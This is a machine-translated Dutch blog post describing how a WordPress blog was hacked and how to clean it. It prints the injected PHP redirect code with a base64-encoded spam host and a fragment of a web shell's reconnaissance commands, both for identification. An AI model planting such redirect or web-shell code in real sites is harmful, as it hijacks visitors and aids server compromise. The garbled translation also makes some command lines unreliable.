In de afgelopen maand heb ik ontvangen waarschuwingen virus in blog van sommige bezoekers. Aanvankelijk heb ik negeerde de waarschuwingen, omdat ik installeerde een vrij goede antivirus (Kaspersky AV 2009) En zelfs blog voor een lange tijd, ik heb nooit een virus alert (lang geleden .. zag ik iets vermoeden dat de eerste refresh verdwenen. Eindelijk ...).
Langzaam begon tot grote variaties zien bezoekersverkeerNa die onlangs gedaald gestaag verkeer en begon te worden meer en meer mensen vertellen me dat stealthsettings.com het virused. Gisteren kreeg ik van iemand een screenshot gedaan wanneer antivirus geblokkeerd een script van stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Het was behoorlijk overtuigend voor mij, dus ik alle bronnen doorzocht zetten. Het eerste idee dat bij me opkwam was te doen upgrade de laatste WordPress (2.5.1), maar niet voordat alle bestanden in het oude script zijn verwijderd WordPress en om te maken back-up database. Deze procedure werkte niet en het kostte me waarschijnlijk veel tijd om erachter te komen waar de bug was, als hij het me niet had verteld. Eugen in een discussie over koffie, vond hij link Google en het zou goed zijn om hem te zien.
MyDigitalLife.info, publiceerde een artikel met de titel: "WordPress Hack: herstel en herstel Google en zoekmachine of geen cookieverkeer dat wordt omgeleid naar Your-Needs.info, AnyResults.Net, Golden-Info.net en andere illegale sites"Dat is het einde van de draad die ik nodig had.
Het gaat over een exploiteren de WordPress gebaseerd op cookiesWaarvan ik denk dat is zeer complex en maakte het boek. Slim genoeg om een te maken SQL Injection Database blog, naar een onzichtbare gebruiker te maken een eenvoudige routine controle Overzicht->Gebruikers, Controleer de server mappen en bestanden "schrijfbaar" (Dat chmod 777), om te zoeken en naar uitvoeren bestanden met de privileges van de groep of de wortel. Ik weet niet wie gebruik maken van de naam en het zien dat er enkele artikelen geschreven over hem, ondanks het feit dat veel blogs zijn geïnfecteerd, waaronder Roemenië. Ok ... Ik zal proberen om te proberen om algemeenheden over het virus uit te leggen.
Wat is virus?
Plaats eerst de bronnen pagina's op blogs, links onzichtbaar voor bezoekers, maar zichtbaar en indexeerbaar voor zoekmachines, met name Google. Op deze manier overdracht Page Rank plaatsen aangeduid door de aanvaller. Ten tweede wordt er nog een ingevoegd omleiding code URL voor bezoekers uit Google, Live, Yahoo, ... of een RSS-lezer en niet de site in koekje. Een antivirus detecteert de redirect als Trojan-Clicker.HTML.
Symptomen:
Verminderde enorme bezoekersverkeerVooral op blogs waar de meeste bezoekers vandaan komen Google.
Identificatie: (hier wordt het probleem gecompliceerd voor degenen die niet veel weten over phpmyadmin, php en linux)
LA. WAARSCHUWING! Maak eerst een back-up database!
1. Controleer de bronbestanden index.php, header.php, footer.php, Het thema van de blog en kijk of er een code die gebruikmaakt van codering base64 of bevat "if ($ ser ==" 1? && sizeof ($ _ COOKIE) == 0) "in de vorm:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... Of zoiets. Verwijder deze code!
Klik op de foto ...
In de bovenstaande schermafbeelding heb ik per ongeluk en " ". Die code moet blijven.
2. Gebruiken phpMyAdmin en ga naar de database tabel wp_usersWaar controleren of er geen gebruikersnaam gemaakt op 00:00:00 0000-00-00 (Mogelijk in veld USER_LOGIN schrijven "WordPress”. Noteer de ID van deze gebruiker (ID-veld) en verwijder deze.
Klik op de foto ...
* De groene lijn moet worden verwijderd en behield zijn ID. Bij slaperigWas ID = 8 .
3. Ga naar de tabel wp_usermeta, Waar je gelegen en verwijderen lijnen ID (waar het veld user_id ID-waarde wordt verwijderd).
4. In Tabel wp_option, Go active_plugins en zie wat plug-in is verdachte ingeschakeld. Het kan gebruikt worden als eindes _old.giff, _old.pngg, _old.jpeg, _new.php.giff, enz. combinaties van nep-afbeeldingsextensies met _old en _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Verwijder deze plug-in en ga vervolgens naar de blog -> Dashboard -> Plug-ins, waar je elke plug-in deactiveert en activeert.
Klik op de afbeelding om te zien lijkt het erop active_plugins virus bestand.
Volg het pad op de FTP of SSH, aangegeven in active_plugins en verwijder het bestand van de server.
5. Ook in phpMyAdmin, in de tabel wp_option, Zoek en verwijder de regel met "rss_f541b3abd05e7962fcab37737f40fad8'En'internal_links_cache ".
In internal_links_cache, aangeboden versleutelde spam links die worden weergegeven in een blog code van Google Adsnek, De hacker.
6. Wordt aanbevolen wachtwoord wijzigen Blog en login verwijder alle verdachte userele. Upgrade naar de nieuwste versie van WordPress en stel de blog zo in dat nieuwe gebruikers zich niet langer kunnen registreren. Er is geen verlies… kan ook onbewoond reageren.
Ik heb hierboven geprobeerd om een beetje uit te leggen, wat te doen in een dergelijke situatie, om de blog van dit virus op te schonen. Het probleem is veel ernstiger dan het lijkt en nog lang niet opgelost, omdat ze worden gebruikt beveiligingsproblemen het hosten van de webserver, die blog.
Als eerste maatregel van veiligheid, met toegang SSH, Maak een aantal controles op de server om te zien of er bestanden zoals * _old * en * _Nieuw. * Met eindes.Giff,. jpeg,. pngg,. jpgg. Deze bestanden moeten worden verwijderd. Als u de naam van een bestand, bijvoorbeeld. top_right_old.giff in top_right_old.phpWe zien dat het bestand is precies de exploit code-server.
Enkele handige instructies voor het controleren, schoonmaken en beveiligen van de server. (via SSH)
1. cd / tmp en controleer of er mappen, zoals tmpVFlma of verwijderen andere combinaties asemenatoare naam en het. Zie de screenshot hieronder, twee van dergelijke mappen voor mij:
rm-rf mapnaam
2. Controleer en elimineer (wijzig chmod-ul) mogelijk de mappen met attributen chmod 777
vind alle beschrijfbare bestanden in de huidige map: Zoeken. -Type f-perm-2-ls
vind alle schrijfbare mappen in de huidige dir: Zoeken. -Type d-perm-2-ls
vind alle beschrijfbare mappen en bestanden in de huidige map: Zoeken. -Perm-2-ls
3. Op zoek naar verdachte bestanden op de server.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, WAARSCHUWING! de bestanden die zijn ingesteld beetje SUID si SGID. Deze bestanden uit te voeren met de bevoegdheden van de gebruiker (groep) of wortel, niet de gebruiker die het bestand uit te voeren. Deze bestanden kunnen leiden tot wortel compromis, als veiligheidsvraagstukken. Als je niet de SUID en SGID bestanden te gebruiken met bits, uit te voeren 'chmod 0 " hen of verwijderen pakket die ze bevatten.
Wordt misbruikt ergens in de bron ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}Vindt op die manier ... in principe inbreuken op de beveiliging. Poorten openen directory "schrijfbaar" en de groep uitvoering privileges bestanden / root.
Terug met meer ...
Besmet sommige blogs: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motorfietsen.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... De lijst gaat maar door ... veel.
U kunt controleren of een blog is geïnfecteerd met behulp van de Google-zoekmachine. kopiëren plakken:
Site: www.blegoo.com kopen
Goedenacht en goed werk;) Binnenkort denk ik dat Eugen met nieuws komt, op prevezibil.imprevizibil.com.
brb :)
AANDACHT! Het thema van . wijzigen WordPress of upgrade naar WordPress 2.5.1 is GEEN oplossing om van dit virus af te komen.
